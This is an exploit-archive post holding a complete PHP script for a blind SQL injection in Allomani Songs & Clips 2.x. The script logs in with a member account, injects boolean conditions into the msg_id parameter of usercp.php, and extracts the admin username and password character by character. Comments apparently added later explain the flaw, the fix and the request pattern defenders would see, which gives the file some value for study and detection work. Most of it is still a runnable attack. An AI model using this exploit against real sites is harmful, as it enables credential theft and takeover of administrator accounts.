Allomani Songs And Clips 2.x Blind SQL Injection
Posted on 16 August 2011
<?php
/* ===============================================================
   Allomani Songs & Clips 2.x (msg_id) Blind SQL Injection Exploit
   ===============================================================
   #[+]Version : 2.x
   #[+]Author : ahwak2000
   #[+]home : tryag.cc/cc/ ~ p0c.cc/vb/
   #[+]Date : 13.08.2011
   #[+]E-mail : z.u5[at]hotmail.com
   #[+]secript home: http://allomani.com
   #[+]Tested On: win xp sp3
   ===============================================================

   Reviewer notes (defensive reading of this proof of concept):
   - The application flaw this script relies on is that the `msg_id`
     query parameter of usercp.php (action=msg_reply) reaches a SQL
     query without being parameterised, so a trailing quote and a
     boolean condition change the result. The server-side fix is a
     prepared statement / integer cast on msg_id; the script's own
     magic_quotes_gpc check below shows that quote escaping merely
     masks it.
   - Every probe is an authenticated request carrying the same two
     cookies (songs_member_data_id and the md5 of the password), so
     an ordinary low-privilege member account is sufficient.
   - The extraction loop issues one request per candidate character
     (see the nested for loops at the bottom), which is the traffic
     pattern a log review or WAF would see: a burst of requests to
     usercp.php whose query string differs only in a small numeric
     literal, all with the fixed MSIE 7.0 User-Agent.
*/
// Disable the CLI time limit: the brute-force loop below is long-running.
ini_set("max_execution_time",0);
print_r(' ___________________________ ________________________| Allomani 2.x eXploit 0d4y |_________________________ _ _ _ _ _ _ _ _ _____ _____ _____ _____ / _ | | | | | | __ | | / _ | |// | _ | / _ / _ / _ \n| |_| | | |_| | | | / | | | |_| | | |_| / / | | | | | | | | | | | | | | | | | _ | | |/ / | | | | | | | | / /__ | |_| | | |_| | | |_| | |_| |_| |_| |_| |___/ \___| |_| |_| |_| \_ |_____| \_____/ \_____/ \_____/ _______________________________________________________________________________ z.u5@hotmail.com ');
// Usage: host, application directory, password and user id of an existing account.
if ($argc<5) {
    print_r(' ----------------------------------------------------------------------------- example: php '.$argv[0].' allomain.com /demo/ user_pass user_id ----------------------------------------------------------------------------- ');
    die;
}

/**
 * Sends one raw HTTP/1.0 request to usercp.php with $inj appended to the
 * msg_id parameter and returns the full response (headers and body).
 *
 * Detection-relevant request signature, as built below: path
 * /usercp.php?action=msg_reply&msg_id=89 followed by the injected text,
 * a fixed "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" User-Agent,
 * and the two songs_member_data_* cookies (the password cookie holds an
 * unsalted md5 of the password, which is itself a weakness of the
 * application's session scheme).
 *
 * Terminates the script (die) when the socket cannot be opened or when the
 * response contains the literal "HTTP/1.1 404 Not Found".
 */
function AHWAK($victim,$vic_dir,$user_pass,$user_id,$inj){
    $host = $victim;
    $p = "http://".$host.$vic_dir;
    //$cookie = base64_encode(":".$inj.":");
    // Request line; the injected fragment is concatenated directly after msg_id=89.
    $packet ="GET ".$p."/usercp.php?action=msg_reply&msg_id=89".$inj." HTTP/1.0 ";
    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) ";
    $packet.="Host: ".$victim." ";
    // Authentication is the member id plus md5(password) as cookies.
    $packet.="Cookie: songs_member_data_id=".$user_id."; songs_member_data_password=".md5($user_pass)."; ";
    $packet.="Pragma: no-cache ";
    $packet.="Connection: Close ";
    // Plain TCP to port 80; the @ hides connection warnings, failure is checked right after.
    $o = @fsockopen($host, 80);
    if(!$o){
        echo " [x] No response... 
";
        die;
    }
    fputs($o, $packet);
    // Read the whole response; $data is appended to without prior initialisation.
    while (!feof($o)) $data .= fread($o, 1024);
    fclose($o);
    // A 404 marker anywhere in the response is treated as a wrong application path.
    $_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
    if ( !empty($_404) ){
        echo " [x] 404 Not Found... Make sure of path. ";
        die;
    }
    return $data;
}

/**
 * Returns the content of the first <textarea> in $from (the reply form body).
 *
 * This is the boolean oracle of the blind injection: the textarea content of
 * a page fetched with a true condition is compared against the one fetched
 * with a false condition, and later against each character probe.
 * Returns null (with a notice) if no textarea matched.
 */
function AHWAK_GET($from){
    preg_match_all("(<textarea .*>(.*)</textarea>)siU", $from, $out);
    return $out[1][0];
}

$host1 = $argv[1];
$dir1=$argv[2];
$userpass=$argv[3];
$userid=$argv[4];
if ($argc > 4) {
    echo " Please wait... ";
    // Baseline request with no injection; the word "profile" in the response
    // is taken as proof that the supplied cookies were accepted.
    // eregi() was removed in PHP 7.0, so this check only runs on PHP 5.
    $login= AHWAK($host1,$dir1,$userpass,$userid,"");
    if(!eregi ("profile",$login)){
        echo " [-] You have entered an invalid username or password. ";
        exit;
    }
    // Reference responses for an always-true and an always-false condition.
    $truths = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"' and 1='1/*"));
    $falses = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"' and 1='2/*"));
    // Identical responses mean the quote was escaped (magic_quotes_gpc), so the
    // condition never reached the query; the script gives up.
    if ($truths == $falses) {
        echo " sorry: magic_quotes_gpc = On ): ";
        exit;
    }
    echo " [+] Getting Admin UserName And PassWord ";
    echo " ----------------------------------- ";
    // Character-by-character inference: 16 positions x ASCII 46..122, one
    // request per candidate (up to 1232 near-identical requests), printing a
    // character whenever the oracle matches the "true" reference page.
    for ($g = 1; $g <= 16; $g++) { //eidt
        for ($i = 46; $i <= 122; $i++) {
            $qest = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"'+and+ascii(MiD((sElEct+concat_ws(0x3a,username,password)+frOm+songs_user+liMit 0,1),".$g.",1))='".$i."/*"));
            if ($qest == $truths) {
                echo chr($i);
            }
        }
    }
    echo " ----------------------------------- By Ahwak2000 ";
}
?>
